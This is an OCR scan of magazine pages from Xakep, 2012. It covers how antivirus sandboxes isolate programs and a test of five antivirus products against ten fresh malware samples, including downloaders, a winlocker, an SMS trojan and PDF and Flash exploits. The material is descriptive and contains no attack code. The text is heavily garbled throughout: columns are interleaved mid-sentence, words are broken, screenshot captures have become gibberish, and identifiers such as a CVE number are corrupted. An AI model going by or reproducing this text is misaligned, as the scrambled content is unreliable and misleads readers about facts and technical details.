!nодложные фу н кц ии находятся в библиотек е SbleDLL.dlll
программ с контролируемыми nараметра-
смо тря на это, данный подход является основ
ми многие объясняют аналогией с детской
ным в большинстве продуктов ISandbox iE,
песочницей. Что ж, такая версия тоже имеет
Bu ffe гZone, изолированные среды антивирусов
рованных или еще незнакомых антивирусу
право на существование, но лично мне ближе
Ka speгsky lnteгnet Secuгity,
вредоносных скриптов, то выходом является
другая. У пожарных «nесочницеЙ>> называется
Secuгity Рго,
эму ляция их исполнения с последующим
специальный бак с песком, в котором можно
анализом по сигнатурам или с помощью эври
безоnасно экспериментировать с легковоспла
стики.
меняющимися веществами.
Для выполнения Jаvа - скриптов исполь
В антивирусных песочницах можно выде
Comodo lnteгnet Avast l nteгnet Secuгity).
Изоляция на основе nравил
В се попытки изменения об ъектов файловой систем ы или реестра не виртуализируются,
зуется движок, который представляет собой
лить три базовые модели изоляции nростран
а рассматриваются с точки зрения набора вну
D L L-мо д уль
ства от всей остальной системы.
тренних правил средства защиты. Недо с таток
jscript.dll.
Он нах одится обычно
в папке % windiг%\system32, содержит реали
такого подхода тот же, что и во втором случае
зацию набора СОМ-интерфейсов и использует
Изоляция на основе nолной виртуализации
-во змо жность выхода зловредного при
ся
Заключает ся в использовании движка
ложения из -п од контроля песочницы. Однако
IE для
лено три
выполнения
JS.
В
Windows
опреде
GUID !уникальных идентификаторов)
вирт уал ьной машины в каче стве защит ного
в этом случае гораздо проще осуществлять
СОМ-объекта- движка интерпретатора
слоя над гостевой операционной системой.
обме н данными между контролируемой средой
ск риптов Jscгipt. Это
{f414c260 -6ac0-11cfb6d 1- ООааООЬ ЬЬЬ58}, {f414c261-6a сО -11 cfb6d1-00aa00bbbb58} и {f414c262-6ac0-11 сf
Такой подход дает очень выс окий у ровень
и ос н о вной системой. Пример - Windows Useг Account Contгolixopoшo всем известный и мно
статки очевидны- большой объем, большое
гим надоедающий контроль учетных записей
Ь6d1-00аа00ЬЬЬЬ58}. Е сли поискать в реестре
потребление ресурсов системы и сложнос ть
Win dows!.
эту строку, то можно уви д еть, какой модуль
обмена данными между основной систе мой
зарегистрирован в качес тве интерпретатора
и песочницей.
защиты основной рабочей си стемы. Недо
В св язи с тем , что наиболее широкое при менение получил в т орой подход, стоит его
рассмотре ть подробнее на примере широко
JavaSc гi pt. Как уже было у п омянуто, обычно Изоляция на основе частичной виртуализа
распространенной песочницы
подменить эту ветку реестра и заре гистри
ции файловой системы и реестра
ло вая система вирт уализ ируется достаточно
ровать в сис теме сво й обработчик скриптов,
Совсем не обязательно использовать движок
пр о сто- путем создания дубликатов паnки
который и буде т выполнять анализ их вре д о
виртуальной машины для изоляции выполне
текущего п ользователя, дубликатов журна
носности и «nущать или не пущать».
ния nрограмм. Можно просто подставпять про
лов транзакций общей файловой системы
это
jscript.dll.
Н о ничего не мешает антивирусу
SandboxiE.
Фа й
анализируются только с крипты, выполняе
объекты файловой системы и реестра, а их
и папок, имитирующих накопители !внутрен ние и внешние!. Также создается дубликат
мые в браузерах, использующих стандартный
дубликаты. Попытка их изменения приведет
реестра.
JаvаSсгiрt-движок
к изменению лишь их копий внутри песочницы,
Недостаток такой подмены в том, что
Windows.
КАК РАБОТАЕТ ПЕСОЧНИЦА
цессам, запущенным в песочнице, не реальные
П осле того как созданы дубликаты фай
реальные данные не изменятся и не п ост рада
ловой системы и реестра, задача песочницы
ют. Основной недостаток так о го вида песочниц
с водится к перехвату всех функций работ ы
Почему-тоnроисхождение названия « nесоч
-n робои или обход, и в результате - выход
с файлами и реестром. Если приложен и е,
ница>> для изолированной среды исполнения
вредоносного кода в основную систему. Н е-
обращаю щ еесяк реестру или пытающееся
соз дать/изменить какой-либо файл, запуще но не и з-по д песочницы, то управление пере
дается оригинальным функциям . Е сл и же
В АНТИВИРУСНЫХ ПЕСОЧНИЦАХ МОЖНО ВЫДЕЛИТЬ ТРИ БАЗОВЫЕ МОДЕЛИ
ИЗОЛЯЦИИ ПРОСТРАНСТВА ОТ ВСЕЙ ОСТАЛЬНОЙ СИСТЕМЫ
такое приложение выполняется в пе с очнице, то вместо настоящего реестра и настоящего внешнего накопителя ему посредством
перехваченных функций подсовываются их дубликаты. П оско льку функций , с помощью которых
можно работать с файловой системой и рее ст р о м, много , то и перехватов приходится де-
ХАКЕР
078
www.epidemz.net
04/159/20 12
С антивируса ми поконч ено'
лать много. К примеру, Saпdboxi E производит
эвристического анализатора. Так работают
Д ля песочницы из состава Comodo lпterпet
перехват
песочницы из состава большинства анти
Security основной режим- режим пос т оянной
вирусных продуктов [в частности Kaspersky
защиты с эвристическим алгоритмом принятия
lпterпet Secu r ity и Comodo lпterпet Security
решения. Однако помимо это г о существует
Рго].
возможность ручного запуска при л ожений
56 функций из пtdll.dll, 68 функций из user32.dll, 71 функции из advap i32.dll, 6 функ ций из kerпel32.dll и 1 функции из ws_32.dll. Теперь пара слов про м етоды принятия решения о помещении выполняемого приложе
в песочнице.
ния в песочницу, а также о режимах ее работы.
Чт о касается режимов работы, то их тоже
ЗАКЛЮЧЕНИЕ
Методов приня'тия решения по большому сче т у
два- режим постоянной защиты и режим
два.
руч н ой защиты. В первом случае приложение
Конечно, некот орые детали остались за
автоматически помещается в песоч ниц у либо
кадром, да и разработчики в антивирусных
На основе правил
выполняется вне ее в зависимости от резуль
лабораториях все время изобретают что -то но
Модуль принятия решения обращается к вну
та т а работы модуля принятия решения при
вое, пытаясь догнать и пере гн ать соз д а т елей
тренней базе правил запуска приложений и в
старте приложения. В о втором- пользователь
вредоно сного программнаго обеспече н ия ... Н о
зависимости от них запускае т приложения либо
сам принимает решение о запуске процесса
главное, что все эти антивирусные премудр о
в песочнице, либо в основ н ой системе. Такой
внутри песочницы. К примеру, для SaпdboxiE
сти обрели порядок и свое место на много
подход применяют Saпdbox iE , Bu fferZoпe.
[песочни ца на основе частичной виртуализа
численных полочках в твоей голове. А там,
ции] основным режимом работы является ре
глядишь, и ты придумаешь что-нибудь такое,
На основе эвристических подходов
жим ручной защиты, но при покупке лицензии
что произведет революцию в антивирусном
В этом случае решение о запуске в песочн иц е
можно активировать режим постоянной за
дел е, и редактору придется выделять место
принимается на основе результатов работы
щиты с принятием решения на основе правил.
под новые статьи в нашем журнале. ::Х:
!@~<>JO «
Sandbox > Drobotun >( DefaultBox
•J
'Чfn'!l:r.I'L~-. 'Тo11 , .. "- •. ,
11iL.
Имя
(nусто)
"- на3sани! тtкуще:~1 nесочн ~щы
_/~
~
дуб1щкат файлоsой
снетемы же:сткихд11СtФе н ане:шм их 11акоn~1Те:Jш'1
~ Ду6JН1К!IТП!Iпtщтекущеrо П0ЛЬ30!!1Т!ЛА de:sktop.ini
_________________________,
r'"-: D_ O.,. N.,. т-_u_ SE_.т__xт . . . . _. Re:gHive:
RegHive.LOGl RegHive.LOG2 RegHive(бbl8ead4· 0eac·ll el·90d4 ·00188ЬЗf4с92 }.ТМ . Ыf RegH ive(бЫ8ead4-0eac - llel-90d4 - 00188ЬЗf4c92 }. TMContainer()0000000000000001 .regtrans·m s RegHive(бЫ8eod4-0 eoc·llel- 90d4·00188ЬЗf4c92}.TMContoiner00000000000000000002.regtrans-ms
""" дуб!IНК!IТЫ Jot<ypHMO! ТР!IН3!1НЦ11Й общей фl!I\~1/\О!ОЙ СИСТ!МЬI Общий nринциn изоляции файловой системы в
SandboxiE
1
Виртуализа ция файловой системы в SandboxiE lв nапке dгive на х одятся nаnки , имитирующие внешние накоnители!
В случае исnользо
ОБЛАЧНЫЕ ТЕХНОЛОГИИ НА АНТИВИРУСНОЙ СЛУЖБЕ
вания песочниц для изоляции выполняе
мого кода следует помнить, что многие
Началом применения облачных технологий в антивирусном
еще не скача на, автоматически проис ходит обновление баз.
деле можно , наверное, считать предоставление
В сигнатурах содержится не только часть тела вир уса или его
а нтивирусными компаниями возможности онлайн-проверки
хэш, но и некоторые типичные сценарии повед е ния , кот орые
файлов на вредоносность. Эта возможность существует
позволяют однознач но определить вредоносно сть программы.
и по се й день, но под облачными те х нологиями в сфере
В антивирусах от ко мпании
а нтивирусной з ащиты сегодня понимается уже совсем
название << Облачный анализ поведения приложений», и с
другое. Почти все крупные антивирусные компании
его помощью подозрительные файлы отправляются на
используют облака в качестве огромной антивирусной базы,
дополнительный анализ.
причем фактически пополняемой самими пользователями ,
Говоря про облачные технологии в сфере борьбы
давшими со гла сие на участие в программе пополнения
с вредоносными программ ами, нельзя не уnомянуть
и уточ нения информации о вредоносных и пот е нциально
<< Лабораторию Kacnepcкoro » с ее
вре доносны х объектах. В разных антивирусных компаниях
rity Network . K5N-
э то называется по-разному. У
позволяющая пользователям пол учать оперативные
Comodo
та же самая фигня носит
руют далеко не всю
систему. Как nра вило , зто несколько
критически важных
объектов, наnример : папки Ргоgгаm
Files, Windows, Useгs\%AIIUse гsPгofile %\Pгogгam
Data, Documents and Setting и ветвь реестра HKLM\ Softwaгe.
Kaspersky 5ecu-
сеть информационной безопасности,
Microsoft 5ecurity E sseпtia l -«Служба динамически х сигнатур 055 [Oyпamic 5igпature 5ervice] ». Если на выходе проактивной защиты файл будет
данны е о репутации программ и веб-сайтов , оперативно
расценен как подозрительный lк примеру, пытает ся изменить
антивирусн ы х nрограммах от << Ла боратории Касперского >>
си стемные файлы), но сигнатурный анализатор на него
реализованы функции веб-филыра, антифишинговый
реагируя на появление новы х угроз . С помощью
K5N
Про обфускацию Jаvа-скриптов очень хорошо написано
в новы х
никак не отреагировал , то создается профиль этого файла,
модуль, функция контроля программ lрейтингование софта
который отсылается для анализа в специальные сервисы
no
Microsoft- 055, 5pyNet и MR5 !Microsoft Reputation 5ervices).
ПК и nереанальным данным) и модуль анти-спам, который
В случае, когда в базе обновления сигнатура уже есть, но она
обращается в
ХАКЕР
из них виртуализи
в статье н JavaScгipt : игры в прятки н
в девятом номере][ 2011 год .
за
признакам опасности при назначении доступа к р есу рсам
K5N
за образцами спам-nисем .
04 /159/ 2012
079
www.epidemz.net
MALWARE
deeonis ldeeonislagmail.coml
Не известная ИСПЫТЫВАЕМ ЭВРИСТИКУ АВЕРОВ НА САМЫХ НОВЫХ В ИРУСАХ Как и з в ес тно, антивирусное ПО работает в полную силу т о лько в том случае, если своевременно получает свои
апдейты . Об этом догадываются и вирмейкеры, которы е выпускают новые версии зловредов чуть ли не каждый д е нь .
Сегодня мы проверим, насколько хорошо аверы справят ся с самыми свежими экземплярами вирусов и троянов ,
к оторы х еще нет у ни х в база х.
егодняшние испытания мы будем
граммнога обеспечения. Вирм е й к еры в своих
!три из которых были nожаты
проводить на реальных зловредах,
ТЗ выделяют А виру в отдельный пункт, а по
дочных файла с расшире н ием
которых написали реальные киберз
уровню прич и няемой головной боли этого
нутри были похожи один на
лодеи для своих реальных киберзлодейских
а вера можно сравн ит ь разве что с
ziр-архив. Всего получилось д еся т ь з лов ре д ов.
нужд. Н апомним, что для всех наших предыду
портит нервы добрым и трудолюбивым вер
щих тестов мы писали собственные сэмплы,
стальщикам и wеЬ-кодерам.
с
IE6,
который
lpe, кото р ые из pdf, а другой- на
Само тестирование у нас буд ет проходить в два этапа . На первом эта п е мы натравим антивирусы с несвежими базами на найде н ные
которые хоть и не были нас т оящими зловреда м и, но усиленностаралисьими предста виться.
UPXI и два зага
УСЛОВИЯ ТЕСТИРОВАНИЯ
трояны и запишем результат. Таким образом мы
Настоящие же трояны должны по казать, кто
Для тестов мы засетапили на вирутапку све
правери м , насколько хорошо аверы сnравляют
из производителей антивирусных программ
женькую
ся с новым, неизвестным им вре д о н осным П О.
лучше отрабатывает деньги, с таким трудом
а затем начали устанавливать антивирусы,
Вторая часть испытаний состоится через неде
добываемые их клиентами. Но чтобы проверка
попутно создавая снапшоты виртуальной
лю после nервой. Мы дадим антивирусам время
была еще хардкорней, мы раздобыли пачку
машины для каждого из аверов, чтобы они
на обнаружение и детект наших зловредов, за
самых свежих представи т елей патогенной
не мешали друг другу. Затем мы быстренько
т ем обновим базы и просканим вредо н осов еще
киберфауны, а для большей надежности еще
проапдейтили базы сигнатур до актуального
раз. Это позволит нам узнать, насколько плохо
и отключили автооб н овление наших испытуе
состояния и оставили все зто хозяйство на не
nротивовирусное ПО сnравилось в nервый раз.
мых примерно за неделю до отлова зловредов.
делю в темном п рохладном месте без интер
Кстати, об испытуемых ан т ивирусах. Сегод
н ета, чтобы наши испытуемые ненароком не
ня к нам в лабораторию попало следующее за
щитное ПО: Kaspeгsky
Space, ESET NOD32
CRYSTAL, Dr.Web Secuгity 5 и Aviгa Fгее
Smaгt Secuгity
Antiviгus. Все претенденты на звание лучшего
из лучших !или, наоборот, худшего из худших!
Windows
ХР sрЗ со всеми апдейтами,
обновились.
НАЧИНАЕМ ТЕСТИРОВАНИЕ Итак, мы подождали, пока антивирусные базы
Через неделю мы пошли за свежей малва рью- описание этой разношерстной компании
достаточно устареют, и начали тестирование.
Сегодня а веры будут идти в алфавитном поряд ке, позтому первым пойдет Aviгa Fгее
ты можешь видеть на врезке.
Н о кое-какую исследовательскую работу
Antivirus.
Для чистоты эксперимента мы вообще вы
нам уже давно знакомы. Стоит сказать лишь
мы все-таки nровели - открыли вирусные
дернули сетевой кабель из машины, на которой
про ПО от немцев - пусть тестируемая версия
файлики в hех-редакторе и посмотрели на них
собираемся проводить тесты,- современные
Aviгa и бесплатная, но она давно считается
с полминутки. В итоге мы смогли рассмотреть
антивирусы очень любят скрытно обновлять
одним и з самых параноидальных антивирусов
два swf-файла, оди н
себя, сливать ин фу о файлах на свои сервера
среди современного зоопарка защитного про-
J аvа-скрипт, четыре исполняемых ехе-файла
Visua l Basic Script,
од и н
и использовать всякие облачные т ехнологии.
ХА К Е Р
080
www.epidemz.net
01./159/2 012
.
Не извест н ая угроза
!'-i ПодробныНоfчет - ЗilЩНfdtеомлью-;ерd
,_
-- - - - -
----
-
--
rJ§~
Scarrrlg completed. Df .WеЬ Scarner detected lh'eats.
Jt' .., Тhreьtsdclteo:ted
3
Cl
1 Flle rwпe
Tl1reat
ЫlбЬ.\>е
!nf".... retj ~q-iv<?
dataOOl
C'I)Ьt.SWF 19Э
EJ
объект
1
?[Ccr ;;.;, e
Просерка на вирусы: заверwwо ш~мьwе Jlинуfы на]аД
О 12/ IZ/201 1 4:02:45 дМ
(собыr*
4,
объеrпов Э7, upettя.
00.00 08)
34.4~" )«1ywe~
0
12/12/201 1 't:02:<17 АМ
Обt14ружено: НEt...R:Exploit:.SCript:.Generic
~ C:\wus\Ьuffer _foldet\ЬII6Ь.~/dMaiXIOO
0
12/ 12/2011 <1:02: 48 дМ
обнарупно: НELR: Tro}МI.WП32 .Gef\enc
~ C:\wus\Ьuffer _folder\sмnpie.dt:a/lf'X
V 12/12/2011 <1:02:53 дlol
34Аач4 3CI8ePUJI!Н4
C:\vrus'IJ<йer_~\j)llбЬ.\>e
==c::J=9 • r:J
1-·
Trr !}<....1.f'.\.Юrop lO 1 1
"' score.swf_
Dr.Web
laxe
ЭЭ
NeutJakzE::
Patt1
Actior1
CPOF
sample.dta
&!~ событнА
Ре)уnьтат
Тhre~sneut.r~:O
C:\vrus\DUffer_folder\sample.dta C:\vrus'l>uffer_~\Seoreswf_
Ре зультаты Кас пера без обновленных баз
с правился с неизаестной ему угрозой лучше всех
•
~"'"'==--"э~ ,
lt
hiQhry r€ rvnrno?f"'I(.<IO th.:lt :r. dlnQ to ~ttm
T/'v~4ts
deteded:
threasneu.rMled:
detected threatj
ЬЕ 1"11
;tr·
<f nme:dat.el'(. Of .Web ~r'V"'er wt apply
, _,. .. ....... (, ..... . . 3 .. ....... _ " , _, ... _ )
O IZ/Itt:ltll ..
>l._.,., _ _
0 L.:JL'1'%1111 .. >14'1""' _ _ .... :!too< 0 L".,<(:'fol•• ..... --..-~--01
. ,",_, ........ _ _ ,__ ,.... I:Jitn911••'81 ... ·--·-z:•-.o(A
4
l<ll•totl•"~ . . , . . - ....... ~- ... ".
О
O шl-'1011~·"'-
.. ,U1 .. ... ~ :~::::~=~= 1811··~
o/IZ/IW:OII . . . . . . . О от".,.".,,.
• ..,
-..._,_,....,.. ~-(----01
Threat
77 14 . 1899 . ехе_
Гr
d.l950
5М'
"'"'-···-...
Actioв
Path
...... .._
-W:too<
[О.. е
C:\vrus\Ьuffer .. \7714.1899.ехе_
1с...
===:r:1·
O utlti'IOII····
E~t.POf
samp!e.dta
Tro~.t-1uiOtoo.20121
C:\vrus\Ьuffer _folder\sai'Т1!Jie.dta
~~~-~.t~
C:\wus\Ьuffer_folder\score.swf_
"" score.swf_
dataool
Е
l635
C:\wus\Ьutr.._fdOO\bllбЬ.\>e
~--1w--J-
,, .......
~-~...,..,.~ogr···"'-
.. " _ _,_.,.... ,..,_ ~~==::-=-~(~--~.,..__... ...,..,,_.,,, ;lt-~~.,_..,.,_
;ас.~~-._._,_,-..., ;1~---·-ftJ:t.c
~--·~- ;;~~----..........-. ;rf~-------
0 >11\tnllll··· ... _ " .
ЬllбЬ.\>0
::t'~J*----""'
.'!1',..__-,..,,...,_...".
::=";'"....:=·.. ~--~---
0 >:11"1:0\1~·-- ... ~-·----...", ...... 0 11/1-11·-... .,._."_fo .... --t"<<.,.ll-l>loll
Object
~C,-~---
с;;'-~-..,~
~_,_., _
_,.,.,._
.. IJ/Itnl81! ....... ",.._......,... . ._ . .
;а:с·-~-·-• ~(
.. -~·J..•.•-.Jo-.4
JJI/ItniiH,.f> ... • - - ( - - :..... _."...,
::JC~.._......,__
O •lll.,..••••и
::::Jс 1 .......,_..,.ом ~_,.._,. .. _,_.,._ ........
...
--·-~,,....
JJrt•otao•••• ...... · - - - - - - · O o>/IQII.JI'!o ... - W , . , . .
O lrti.,.II•JI'IS"" Il!IW:OII6JI''.., Jцtltr.lll
~·-t
_ _ _ .,
----·-lf"'"""" . . '"
. . . . . . . . ._ _ _
,_~
O il/l<t:llo,JI!!'"'-"'
....
...IW'-
;:tC\._."·011""' ... ~c~-""'
::Jt\,._o<tf!O]ootro ::::)С\
___ _
:::J-.-,...
0 ::'::~~~::: ~=---;'""-=~ ~~~=
:dcit.SWF m
Kaspersky отжог: total detection
Доктор Веб совсем плох, свежие базы сигнатур ему не помогли
Поэтому, чтобы все было честно, доступ к сети
каче с твенно выделить сигн а т уры , мы не знаем ,
у ж е под другим именем IHEUR:Tгojan.Win32.
был жестко ограничен. Также мы отключили
но факт остается фактом,- т р ой о бнаружен.
G e neгicl. Программка-загр узчик своих старших
файловые мониторы и прочие фоновые про
Остальные два детекта- зт о экс плоиты.
б ратьев стабильно детектится нашими анти
верки, чтобы эти компоненты защитного ПО н е
Первый эксплуатирует уязвим ос т ь в формате
виру с ами. Второй угрозой был рdf-эксплоит,
мешали скопировать наш минизверинец на ПК.
pdf, о чем недвусмысленно гов орит название
об н ару ж е нный Доктором Вебом, но имя по вер
вируса 1Exploit.PDF. 263ЗI, а в торой покушается
с ии Ла б оратории Касперекого у него немного
хивчик со зловреда ми в с пециально отведен
на Flash - Exploit.SWF.193. Стоит н апомнить,
друго е - HEUR:Exploit.Scгipt.Geneгic. Видно, что в об о их случаях отработала эвристика, но
Но вернемся к испытаниям. Распаковав ар ную для них директорию, мы кликнули по этой
что у нас было два swf-файла , н о о па с ным
директории правой кнопкой мыши и выбрали
был признан только один. Так же с л е дует
непонятно, поч е м у в отчете нет информации
пункт Sсап. Не слишком расторопная А вира
сказать, что эксплоиты обычно не с одержат
о третьем опасном файле, ведь в первоначаль ных результатах говорилось о трех угрозах.
немного призадумалась, но затем все же заня
какого-либо вредоносного кода , а с лужат лишь
лась сканированием, после чего выдала окно
для загрузки настоящих вирусов . Aviгa Fгее
Мы не можем сказать, был ли детект третьего
с результатами. Из десяти вредоносных файлов
Antiviгus не обнаружил этих файл о в - возмож
зверька, а потому засчитываем только два
Av iгa обнаружила только оди н , обозвав его DR/
но, потому что по надеял с я перехватить бол е е
положительных срабатывания эвристики, что
Delphi.Gen. Благодаря гуглу, официальному
серьезную угрозу !но, как оказалось в итоге,
дает нам результат 2/10.
сайту и помощи Каnитана Очевидность мы
сделать этого не смог!. Доктор Веб же поступил
выяснили, что своему детекту зловред обязан
более nродуманно, попытавшись о безвредить
все тех же файлов завершилось сообщением
эвристическому движку антивируса. Таким об
заразу на ранних этаnа х настуnл е ния. Tгojan.
об одной найденной угрозе. Самые догадли
разом, эвристика сработала, но не совсем так,
Mu1Dгop.20121 также является загрузчиком
вые уже , наверное, поняли, что это был тот
как того хотелось бы германским п рограмми
других вирусов.
самый ехе-загрузчик, который попался трем
с там. Результат 1/1 О хоть и лучше, чем ничего, но как-то не внушает особенного оптимизма. Следующим идет Dг.Web Secuгity Space.
Итак , Dг.Web обнаружил три угрозы из десяти, что лучше , чем у немецкого антивируса,
П ослед ним идет
NOD32. Сканирование
предыдущим антивирусам. На э тот раз его имя
было Win32 / lnjectoг.FP. К сожалению, мы так
но все равно недо с таточно хорошо для защиты
и не смогли понять, сработала ли тут сигна
Зеленый паук был натравлен на ту же самую
системы. Следующий у нас в списке Kaspeгsky
тура в базе или эвристический движок, но
папку. Сканирование прошло быстро, и его
CRYSTAL. Забегая вперед, скажем, что его
одно очеви дно: результат 1 из 10- это плохой
резул ьтаты оказались п олучше, чем у пред
результаты нельзя трактовать однозначно, но
результат.
шественника. Главной угрозой ста л все тот
обо всем по порядку.
же DR/Delphi.Gen, но уже с новым именем - Tгojan. Mu 1Dгop.20121. Судя п о названию,
мы nолучили сообщение, говорящее нам о трех
По сле того, как мы проте стили аверов не
файлик был об нар уже н с помощью конкретной
обнаруженных угрозах . Чтобы рассмотреть
известными для них троянам и, мы оставили
сигнатуры, которая была в базе уже д овольно
получше, что же там нашел каспер, мы решили
их в покое на недельку, а потом обновили
давно. Число 20121, видимо, означает размер
взглянуть на подробный отчет, но тут нас ждал
базы сигнатур. За неделю любой уважающий
вредоноса, но у нашего зверька этот размер
сюрприз- в табличке с найден ными злов
себя антивирус должен переловить всех на
немного отличается-
реда ми было всего два файла. Первый- это
ших зловредов и научиться безжалостно их
уже хорошо известный нам DR /Delphi.Gen, но
уничтожать. Н у что же, проверим, так ли это
20992 байт. Повезло
доктору, или ему действительно удалось та к
ХАКЕР
П осле сканирования вирусной директории
ВТОРОЙ ЭТАП ИСПЫТАНИЙ
081
04 / 159/2 012
www.epidemz.net
MALWARE ~ luke Filewalker
~
111
- - ~~ - -
А virus or unwante d progr am wa s found !
А viru s or unwanted progra m was foundl
CKi'I Hit posa ннe к омnьют ера
-
6
6
неlр
ко~~"tо:тtо npoщм~OOI.f"".O: od~•••ot. Н
Help
Please select the action(s) to Ье performed.
Detections
Detections Detection
1
Кo.Jiм.,tC\'1.0 API>oltм~""' о6~-.-тоt: 1 КOJI"" to:тtoow~ .. tм•OIX06\t....,ot; (1
Please select the .!!Ction(s) to Ье perfmmed.
1
~
Моvе
Actlon
NODЗ 2 - совсем как OЬiect
_j
to Qu~antlne
w.php@f-78#e-O.exe_
T R10Ьlusиte .OG. 8З
Мо\'е
to qu~cюtine
sample .d:a
~
Моvе
to qu~antine
Моvе
to quarant:ine
m.!lin.php@pё:oe=98dЗЬfб . .. HT МL!Q!a . oown .c.z
Avira
Action
Detection
d8fda25a
вostsnoщt .Ьoqvo
Моvе
to quarantine
Ы tбЬ .Iре
~
Мо\'е
to quaranti'le
771'1 . 1699.ехе_
TRIOffend.KD.465792. 15
МОvе
to QU;Y.,ntine
Скан 11рование комnьютера
ш~~w.а ~~~~~w о61.•~'~о•: Кott~~tniO ugJ"<I~~ouo; o6\to.'tOI: 6
~-------------------------г
V1rys lnfgrmat!on 1
APply now
]
1
29
Кo~ .... w.a<>"" ..-on:o&ot.-тo•.O
-----
c.,.......,Ofo_~J7t•~ttttц_·ooo~Wn)11'fl>'PtrМO.•--
Г
opyf~tOQI.'Oor
~ancel
Ь.''!ft'
~ly now
\lirus information J
1
t.ancel
cw.u. .. !'lw .Wd8r"IIIIIIIW C .........
..t"-~---
_lo»>J~I..f_ 1\t>•fТ·o~"""'l.lCZ,_"__
C~f>.Ao _ . . , _ ... -----~w.н·--С
...,~Н.,_It:Jd.,._.
.... I.·S\'I';focolcoTЧO<'Ic;т_.~
(
,.-o,ffr.}tll:8l." hf'•111•o..Oe•
~W...J~IICI,r..,.\Gc;т-~
После обновления у Авиры все намного л уч ш е
NODЗ2 обновился и нашел шесть з ловр едов
на самом деле. Со свежими базами Авира по
чие разоблачающие действия, к о т о рые были
n о л у ча ют Aviгa и
казала себя ровно в шесть раз л у чше, чем на
выnолнены в процессе пров е рки. В итоге
n ус ть они сами решают, у кого на полочк е
Скромные р ез ультаты
Avira Free Antivirus
он будет стоять!. Всего один обнаруженный
первом этапе, но четыре файла так и не были
Kaspersky Crystal
идентифицированы спустя неделю после их
ружил все десять зловредов, большинство
зловред в первом испыта нии- это чуть
выхода в дикую пр ироду. Также интересно,
из которых были уничтожены в первые же
лучш е, чем ничего, а шесть троя нов после
что Aviгa обнаружила рdf-эксплоит, который
секунды, хотя два файла по н еnо нятным нам
обновл е ния баз можно назвать улучшением
ранее не видела, хотя его коллеги ругались
причинам так и остали с ь л ежат ь на жес тком
ситуации на
на него в первую очередь.
диск е. Такой результат заслуживает ув ажения,
равно бу д ет инфицирована, даже если вы
лю назад не обнаруживалея ни одним авером,
кот орое, однако, может быстро рассеяться,
регулярно об новляетесь••.
на этот раз попал в поле зрения немецкого
есл и мы вспомним результ аты nервой части
защитного П О, назвавшего его HTML/Dicг.
те стиров ания.
Oawn.C.2.
JS,
который неде
Остальные детекты- это ехе
ESET NOD32
со свежими б азами об на
ESET [кубок один, потому
600%
или <<ваша система все
Кубок <<За лучшие базы сигнатур •• nо
лучает ан тивирус Касперского, 10/1 О- это выстуnил с результатом, и ден
действительно впечатляе т. Пр авда, если ты
файлы, а swf-эксп лоиты были отпущены на
тичным Ав ире -ше сть из десяти. Правда, на
свободу. Шесть из десяти- таков результат
бор детектируем ых файл ов немного отли чался
схватишь совсем свеженький вирус [а настоя щие киберзлодеи об этом позаботятся! , то т ебе
Aviгa Fгее Anti v iгus со свежими базами.
- больше экс плоитов , м еньше ехе-фай лов,
скорее всего захочется расколотить это т кубок
но это не особенно влияе т на общую оце нку.
об голову п обе дителя.
Теперь очередь D г.Web. По сле обновле
ния баз мы не увидели такого nрогресса, как у nредыдущего антивируса. Всего лишь четыре
А теперь настало время для подведен ия
из десяти: к списку вредоносов добавил ся один исполняемый файл, который окрестили как
Антивирусу Dг.Web достается сразу два
кубка: «За самую отчаянную борьбу с неиз
и т ого в .
вестными д оселе зловреда ми•• и <<За самый
НАГРАЖДЕНИЕ
отстойный детект с обно вленными базами••.
Tгojan.SMSSend . 1950. Б ольше ничего подозри
Мы решили, что называть лучшего в этих
Слишком медленно добавляете сигнатуры,
тельного доктор не обнаружил.
исnытаниях будет не совсем правильно,
госnода, слишком медленно.
Ка спе рекий проявил себя иначе. Про сканив
nоэтому вместо перв ого, второго и так да
На этом мы прощаемся с тобой и сnуска
лее мест мы раздадим кубки за достижения
емся обратно в наш подвал - лабораторию, где
большое число инфицированных объек т ов,
в различных номинациях. П е рвый кубок
займемся новыми бесчеловечными опытами
что скорее всего означает расnаковку и про-
<< За самые nосре д с твенные результа ты •• -
и тестами.
директорию с вирусами, он выдал неприлично
I
А ЧТО ЖЕ ЭТО ЗА ВИРУСЫ ТАКИЕ? Чтобы т ес тирование было максимально честным, мы собрали
требу ющего о плат ы за разблокировку. Не отказались мы и от
предст а вител е й самых разны х областей зловредного мира . Один
мобильного сек тора- троянец, отправляющий СМС на nлатны е
из вредоносов << выбрасывает из себя •• множество разнообразной
ном ера, тоже поnал в ис с л едование. Кроме того в тесте у частвовала
ма лвари- троянцев, бэкдоров и проч ей н еч исти . Этим и объяс ня ется
моше ннич еская прогр амма, относя щая сяк ка тегории << nлатны х
удивившее автора рас хож дение в количестве д е т ектов. Др у гой вообще
архи вов •• !такие програ ммы требую т отnравить СМС на преми ум -ном е р
представляет собой с криnт на языке
якобы за получени е д осту п а к заа рхивированному файлуl. Такж е был
VBS,
основными назначениями
ко торого являются загрузка и запуск другого троянца. Еще в файла х,
учас тв ую щи х в тест е, присутствов а л экс плойт, эксn л уа тирующий
CVE-
nротестирован РОF -эксплойт, вариации которого широ ко и с поль зую тс я в экс пло йт -пака х для пров е д ения dгive-by атак. Наконец, в т есте
201-0611 . Ск риптовый т роя н-загрузчик , ана логичный выш ео пи са нном у, но созданный на JS, тоже п опал в выборку. Не обошлось и без
участвовали троянец , выполняющий множество дестр уктив ны х
w inlockeг 'a - вредоноса, блокирующего р аботу систе мы , а затем
и заnуск зловре д а.
действий , и вредоносный flash-фaйл, осу щ еств ляющий за гр узку
ХАКЕР
082
www.epidemz.net
04/159/2012
Preview КОДИНГ ТRUЕ-КРИПТОВАНИЕ
088
CerOI\HЯ у нас сложная задача- сделать шифравалку данных, которая nозволя ла бы создавать невидимые в системе контейнеры и использовала собствен ный криптографический алгоритм. За основу мы возьмем известную программу
TrueCrypt, которая расnространяется с открытыми исходниками. Убедившись в отсутствии в ней закладок, мы создадим
•доверенный»бил дутилиты ,вкотором точно будет все о к. Недоверие к зару беж ным шифрам и здоровый патриотизм наталкивают на мысль реализовать
отечественныекриптографические ал горитмы, которые во многом не устуn ают
зарубежным аналогам. Этим и займемся,
благо сделать это не сильно-то и с ложн о.
КОДИНГ
UNIXOID /
\ SHIM: НОВЫЙ МЕТОДИНЖЕКТА
ЗВЕНЬЯ ОДНОЙ ЦЕПИ
Способы инжекта кода в атакуемое nри
Одним из главн ых новше с тв ядра
ложение давно известны. Однако оста
вереи и
лись такие технологии как
Linux
2.6 стала поддержка виртуальной файловой систе мы sysfs. Как это может
Shim Епg iпе,
которые еще могуттебя удивить.
быть полезно обычным n о льзователям?
SYN\ACK
11
